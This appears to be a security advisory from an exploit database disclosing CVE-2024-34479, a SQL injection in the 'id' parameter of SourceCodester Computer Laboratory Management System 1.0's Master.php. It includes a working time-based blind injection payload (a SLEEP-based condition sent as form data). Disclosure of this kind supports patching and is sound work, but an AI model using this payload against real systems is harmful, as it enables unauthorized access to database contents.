SourceCodester Computer Laboratory Management System 1.0 (Master.php) - SQL Injection

2024.08.03
Risk: Medium
Local: Yes
Remote: No
CWE: N/A

# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (Master.php) - SQL Injection # Date: 05 May 2024 # Exploit Author: Kavia Baskar # Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html # Version: v1.0 # CVE: CVE-2024-34479 # Tested on: Windows, XAMPP, Apache, MySQL [Suggested description] SourceCodester Computer Laboratory Management System 1.0 allows classes/Master.php id SQL Injection. ------------------------------------------ [Vulnerability Type] SQL Injection ------------------------------------------ [Vendor of Product] SourceCodester ------------------------------------------ [Affected Product Code Base] SourceCodester Computer Laboratory Management System - 1.0 ------------------------------------------ [Affected Component] The functionality allowing users to modify borrowing records information within the application. ------------------------------------------ [Attack Type] Local ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] To exploit this vulnerability, the following payload can be used to retrieve the data from the database ------WebKitFormBoundaryeubsFzqrWToLg4au Content-Disposition: form-data; name="id" ' AND (SELECT 6270 FROM (SELECT(SLEEP(5)))jgeq) AND 'QpoF'='QpoF  on 'id' parameter on 'http://localhost/php-lms/classes/Master.php?f=save_category' ------------------------------------------ [Reference]  https://www.strongboxit.com/ [Discoverer] Kavia Baskar with StrongBox IT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top